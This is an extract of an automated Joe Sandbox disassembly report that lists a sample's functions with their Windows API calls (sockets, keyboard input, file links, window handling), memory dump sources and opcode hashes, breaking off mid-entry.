                                                                                                                                                                                                                                                                Function 00AA2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00AA255A
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA2568
                                                                                                                                                                                                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AA25E7
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA25F1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                • Opcode ID: 3afc83714d36a1b140b2bdc162e2ad34368146bf3655e2a454cf4ba63addb323
                                                                                                                                                                                                                                                                • Instruction ID: 19d86832835d652271918f6e1e0182e823c81ad021886f679e206bb9ce5db204
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3afc83714d36a1b140b2bdc162e2ad34368146bf3655e2a454cf4ba63addb323
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9741CF34A00211AFE720AF28D886F2A77A5EB05718F54C458F91A8F2D2D772ED528B90
                                                                                                                                                                                                                                                                Function 00AB6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AB6D1A
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AB6D4D
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00AB6DBA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                • Opcode ID: 5cb6fb095e11bf096491026bd0de07758a9e1dfc9a6cf3164890a219b1012546
                                                                                                                                                                                                                                                                • Instruction ID: 6429370e2416757db8e30e8b8ac832c7e6900f2ddb0804c4b79099b424d0b293
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cb6fb095e11bf096491026bd0de07758a9e1dfc9a6cf3164890a219b1012546
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8512C75A00609AFCF24DFA4D881AEE7BBAFB44320F108559F9159B291D774ED81CB50
                                                                                                                                                                                                                                                                Function 00A5B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 6b97ed0f6fcce58af9d6c5ce9d0d32123dd5978dc6ad185ed9195e62c60cb600
                                                                                                                                                                                                                                                                • Instruction ID: 544de97f382bab91e5caac611d6d12f9775a2fbae512a29d55a02e83254f49be
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b97ed0f6fcce58af9d6c5ce9d0d32123dd5978dc6ad185ed9195e62c60cb600
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3412971A10704AFD724AF78CD41BAABBFDFB88712F20952EF411DB291D371A9058790
                                                                                                                                                                                                                                                                Function 00A9611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A961C8
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00A961EE
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A96213
                                                                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A9623F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                • Opcode ID: c394d20f21a6b863b384908e31a479510d6287ba677cec2ebb5b1d2ee91670f4
                                                                                                                                                                                                                                                                • Instruction ID: 21bceac12bca08060c66aaec670969a8b5a56a82224becdc556fb621443777da
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c394d20f21a6b863b384908e31a479510d6287ba677cec2ebb5b1d2ee91670f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7414E39600620DFCF15EF58C645A5DBBE2EF89710B198498F84A9B362CB34FD41DB91
                                                                                                                                                                                                                                                                Function 00A8B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00A8B473
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 00A8B48F
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00A8B4FD
                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00A8B54F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 432972143-0
                                                                                                                                                                                                                                                                • Opcode ID: 26e9653d9989a6178d1a60ef435bfe66e86b1066a79b44709c5acec89597109a
                                                                                                                                                                                                                                                                • Instruction ID: 323b284324b29dc8c68577df2db47921224dcf16acbcc1ea85a2fa409fd50001
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26e9653d9989a6178d1a60ef435bfe66e86b1066a79b44709c5acec89597109a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0314870A60608AEFF34EB6488067FA7BB5AB58310F04431AE496961E2D37899868775
                                                                                                                                                                                                                                                                Function 00A8B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00A8B5B8
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00A8B5D4
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00A8B63B
                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00A8B68D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 432972143-0
                                                                                                                                                                                                                                                                • Opcode ID: dbfb4490bb11584c66be8d0947ab3a3c2ddc3649648c41e32246a78b99d6b125
                                                                                                                                                                                                                                                                • Instruction ID: 32030de65541a3ca5aac793da28660d3d461ac94b662502539291be4c151b97d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbfb4490bb11584c66be8d0947ab3a3c2ddc3649648c41e32246a78b99d6b125
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2312D30D606485EFF30EB6488057FA7BB6BF95310F04423AE485561E1E77489468BB1
                                                                                                                                                                                                                                                                Function 00AB80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 00AB80D4
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AB814A
                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00AB815A
                                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 00AB81C6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                • Opcode ID: ba80d5835c9e1e69eb604649e15f9910a344df438775691cde81d1569db20cfb
                                                                                                                                                                                                                                                                • Instruction ID: 62909647c7bc8f055eecbf8498ef917dfea370f5fc92f251403c794ae7d00729
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba80d5835c9e1e69eb604649e15f9910a344df438775691cde81d1569db20cfb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1416030602215DFCB15CF9CE884BE977FDBB45314F1442A8E9559B262CB79A843CF90
                                                                                                                                                                                                                                                                Function 00AB2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00AB2187
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A843AD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: GetCurrentThreadId.KERNEL32 ref: 00A843B4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A82F00), ref: 00A843BB
                                                                                                                                                                                                                                                                • GetCaretPos.USER32(?), ref: 00AB219B
                                                                                                                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00AB21E8
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00AB21EE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                • Opcode ID: cd83b927d5ddfe8a581d8d975950ad7c7c3e3a6949140358945b1f7e2e93f613
                                                                                                                                                                                                                                                                • Instruction ID: f19e99d44934466c87b0c268fd7991f33ab20dfc0dbaf64e66d144c2f3de3bb6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd83b927d5ddfe8a581d8d975950ad7c7c3e3a6949140358945b1f7e2e93f613
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4314171D01119AFCB04EFA9D981DEEBBFCEF48304B50846AE415E7212DA759E45CBA0
                                                                                                                                                                                                                                                                Function 00A8E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A241EA: _wcslen.LIBCMT ref: 00A241EF
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8E8E2
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8E8F9
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8E924
                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00A8E92F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                • Opcode ID: 731e9cf4e35503f910bb4ca96f9421507271c56a8cda5ed374771f4c74a5f875
                                                                                                                                                                                                                                                                • Instruction ID: 464866894748e17adc1b74f1c17738b772d4a795b58e689393c6ae5db361179c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 731e9cf4e35503f910bb4ca96f9421507271c56a8cda5ed374771f4c74a5f875
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC21C775D00214EFDB10EFA8DA81BAEB7F8EF85350F144165E905BB341D6709E41C7A1
                                                                                                                                                                                                                                                                Function 00AB9A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00AB9A5D
                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AB9A72
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00AB9ABA
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00AB9AF0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                • Opcode ID: ff3159f16bb991d0a645563ce1bea131bb54818819ea892ef80fc952d26680f9
                                                                                                                                                                                                                                                                • Instruction ID: 7e76f65f4c29321ebc9198bf26cde5474a69e1a75f9b291229f8900051860961
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff3159f16bb991d0a645563ce1bea131bb54818819ea892ef80fc952d26680f9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B321BF34600018EFCF25CF94C898EFB7BB9EF09390F404169FA098B162D7759962DB60
                                                                                                                                                                                                                                                                Function 00A8DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00ABDC30), ref: 00A8DBA6
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A8DBB5
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A8DBC4
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00ABDC30), ref: 00A8DC21
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                • Opcode ID: d16b44b2c9f69d4512ace50942a420e441404d9655592fc3e823fe09c1765e73
                                                                                                                                                                                                                                                                • Instruction ID: a935222cf18811c4041333359aa33d30f161ef83db7bbc65234861150ddec106
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d16b44b2c9f69d4512ace50942a420e441404d9655592fc3e823fe09c1765e73
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD2183705442059F8704EF38D98499BBBE8FE56364F104A29F499C72E2E731D946CB92
                                                                                                                                                                                                                                                                Function 00AB321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00AB32A6
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AB32C0
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AB32CE
                                                                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AB32DC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                • Opcode ID: 2276a563ea6bc08d0c7c2197c7643d0875a609dca95aa962638e4c18f38072cb
                                                                                                                                                                                                                                                                • Instruction ID: ef7b6a186a50839d69c5dc438501115425b13763db7363d183ef7c03274065c3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2276a563ea6bc08d0c7c2197c7643d0875a609dca95aa962638e4c18f38072cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D21B832205511AFDB14DB14C855FEA7B59EF55324F148258F4268B2D3C771ED82C7D0
                                                                                                                                                                                                                                                                Function 00A8825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A896E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00A88271,?,000000FF,?,00A890BB,00000000,?,0000001C,?,?), ref: 00A896F3
